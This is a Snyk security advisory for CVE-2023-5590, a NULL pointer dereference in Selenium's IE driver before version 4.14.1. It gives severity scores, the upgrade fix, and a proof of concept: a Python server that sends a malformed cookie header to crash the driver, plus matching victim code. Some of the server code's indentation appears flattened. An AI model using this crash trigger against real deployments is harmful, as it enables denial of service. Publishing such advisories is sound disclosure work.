Homepage
About Snyk

NULL Pointer Dereference Affecting org.seleniumhq.selenium:selenium-ie-driver package, versions [,4.14.1)

0.0
high

Snyk CVSS

    Attack Complexity Low
    Availability High

    Threat Intelligence

    Exploit Maturity Proof of concept
    EPSS 0.05% (16th percentile)
Expand this section
NVD
7.5 high
Expand this section
Red Hat
7.5 high

Do your applications use this vulnerable package?

In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.

Test your applications
  • Snyk ID SNYK-JAVA-ORGSELENIUMHQSELENIUM-6062318
  • published 16 Nov 2023
  • disclosed 15 Oct 2023
  • credit coolkingcole
Report a new vulnerability Found a mistake?

Introduced: 15 Oct 2023

CVE-2023-5590 Open this link in a new tab
CWE-476 Open this link in a new tab

How to fix?

Upgrade org.seleniumhq.selenium:selenium-ie-driver to version 4.14.1 or higher.

Overview

Affected versions of this package are vulnerable to NULL Pointer Dereference due to an insufficient check on CookieWndProc function. An attacker can cause the application to crash by sending specially crafted data that triggers this condition.

PoC

Attacker Server Code

from http.server import BaseHTTPRequestHandler, HTTPServer
from datetime import datetime, timedelta


class CustomHTTPRequestHandler(BaseHTTPRequestHandler):


def do_GET(self):
    # Send response status code
    self.send_response(200)

    # Send headers
    self.send_header('Content-type', 'text/html')
    # Set the cookie expiration to one day in the future
    expiration_date = (datetime.utcnow() + timedelta(days=1)).strftime('%a, %d %b %Y %H:%M:%S GMT')
    
    well_formed_cookie = f"cookie_name=cookie_value; Domain=127.0.0.1; Path=/; HttpOnly; Expires={expiration_date};"
    self.send_header('Set-Cookie', well_formed_cookie)

    malicious_cookie = f"cookie_name2" #crash
    self.send_header('Set-Cookie', malicious_cookie)

    self.end_headers()

    # Send message back to client
    message = "Hello world!"
    self.wfile.write(bytes(message, "utf8"))
    return



def run():
    print('Starting server...')
    server_address = ('127.0.0.1', 8090)
    httpd = HTTPServer(server_address, CustomHTTPRequestHandler)
    print('Server is running...')
    httpd.serve_forever()


run()

Example Victim Code

from selenium import webdriver
import logging
import time


handler = logging.FileHandler("sel.log")
logger = logging.getLogger('selenium')
logging.basicConfig(level=logging.DEBUG)
logger.setLevel(logging.DEBUG)
logger.addHandler(handler)


options = webdriver.IeOptions()
options.ignore_zoom_level = True
options.ignore_protected_mode_settings = True
options.attach_to_edge_chrome = True
options.initial_browser_url = 'https://selenium.dev'
service = webdriver.IeService(log_file="ie.log", log_level='DEBUG')
driver = webdriver.Ie(options=options,service=service)


driver.set_page_load_timeout(20)
print("Getting the page: ")


try:
    driver.get("http://127.0.0.1:8090/")
except Exception as e:
    print(e)


print("Got the page!")
print("Get Cookies: ")
cookies = driver.get_cookies()
print(cookies)
time.sleep(3)
driver.quit()

References